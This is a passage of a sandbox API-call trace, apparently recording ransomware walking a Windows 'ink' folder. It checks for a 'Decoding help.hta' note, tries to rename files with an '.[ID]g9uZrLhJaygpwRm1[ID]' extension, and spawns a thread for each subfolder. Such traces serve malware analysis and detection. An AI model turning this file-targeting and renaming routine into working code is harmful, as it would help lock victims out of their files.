lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipssrb.xml", cAlternateFileName="")) returned 1 [0053.210] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.210] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.210] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.210] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.210] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipssrb.xml") returned -1 [0053.210] lstrlenW (lpString="ipssrb.xml") returned 10 [0053.210] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.210] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.210] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipssrb.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" [0053.211] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" [0053.211] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.211] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27dc6b13, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27dc6b13, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa24, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipssrl.xml", cAlternateFileName="")) returned 1 [0053.211] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.211] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.211] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.211] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipssrl.xml") returned -1 [0053.211] lstrlenW (lpString="ipssrl.xml") returned 10 [0053.211] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.211] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.211] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipssrl.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" [0053.211] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" [0053.211] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.211] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27decc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27decc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipssve.xml", cAlternateFileName="")) returned 1 [0053.211] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.211] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.211] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.212] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.212] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipssve.xml") returned -1 [0053.212] lstrlenW (lpString="ipssve.xml") returned 10 [0053.212] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.212] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.212] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipssve.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" [0053.212] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" [0053.212] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.212] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0053.212] lstrcmpW (lpString1=".", lpString2="it-IT") returned -1 [0053.212] lstrcmpW (lpString1="..", lpString2="it-IT") returned -1 [0053.212] lstrcmpiW (lpString1="windows", lpString2="it-IT") returned 1 [0053.212] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.212] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.212] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="it-IT" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT" [0053.212] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*.*" [0053.212] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0053.212] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9358180, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x484 [0053.213] CloseHandle (hObject=0x484) returned 1 [0053.214] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0053.214] lstrcmpW (lpString1=".", lpString2="ja-JP") returned -1 [0053.214] lstrcmpW (lpString1="..", lpString2="ja-JP") returned -1 [0053.214] lstrcmpiW (lpString1="windows", lpString2="ja-JP") returned 1 [0053.214] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.214] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.214] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ja-JP" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP" [0053.214] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*.*" [0053.214] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0053.214] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a18b40, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x484 [0053.215] CloseHandle (hObject=0x484) returned 1 [0053.216] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b45ecf9, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x8b45ecf9, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2b0dd120, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x14de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="journal.dll", cAlternateFileName="")) returned 1 [0053.216] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.216] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.216] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.216] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.216] lstrcmpiW (lpString1="Decoding help.hta", lpString2="journal.dll") returned -1 [0053.216] lstrlenW (lpString="journal.dll") returned 11 [0053.216] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.216] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.216] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="journal.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll" [0053.216] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll" [0053.216] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0053.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\journal.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\journal.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.216] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0053.216] lstrcmpW (lpString1=".", lpString2="ko-KR") returned -1 [0053.216] lstrcmpW (lpString1="..", lpString2="ko-KR") returned -1 [0053.216] lstrcmpiW (lpString1="windows", lpString2="ko-KR") returned 1 [0053.216] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.216] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.217] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ko-KR" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR" [0053.217] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*.*" [0053.217] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0053.217] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1108f868, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x484 [0053.219] CloseHandle (hObject=0x484) returned 1 [0053.219] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0053.219] lstrcmpW (lpString1=".", lpString2="lt-LT") returned -1 [0053.219] lstrcmpW (lpString1="..", lpString2="lt-LT") returned -1 [0053.219] lstrcmpiW (lpString1="windows", lpString2="lt-LT") returned 1 [0053.219] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.219] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.219] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="lt-LT" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT" [0053.219] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*.*" [0053.219] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0053.219] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x114d11f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x484 [0053.221] CloseHandle (hObject=0x484) returned 1 [0053.221] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0053.221] lstrcmpW (lpString1=".", lpString2="lv-LV") returned -1 [0053.221] lstrcmpW (lpString1="..", lpString2="lv-LV") returned -1 [0053.221] lstrcmpiW (lpString1="windows", lpString2="lv-LV") returned 1 [0053.221] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.221] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.221] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="lv-LV" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV" [0053.221] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*.*" [0053.221] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0053.221] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x33b01e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x484 [0053.815] CloseHandle (hObject=0x484) returned 1 [0053.815] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69e22d6e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x69e22d6e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x3188e7b0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1a0200, dwReserved0=0x0, dwReserved1=0x0, cFileName="micaut.dll", cAlternateFileName="")) returned 1 [0053.815] lstrcpyW (in: lpString1=0x2a740278, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.815] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.815] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.815] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.816] lstrcmpiW (lpString1="Decoding help.hta", lpString2="micaut.dll") returned -1 [0053.816] lstrlenW (lpString="micaut.dll") returned 10 [0053.816] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.816] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.816] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 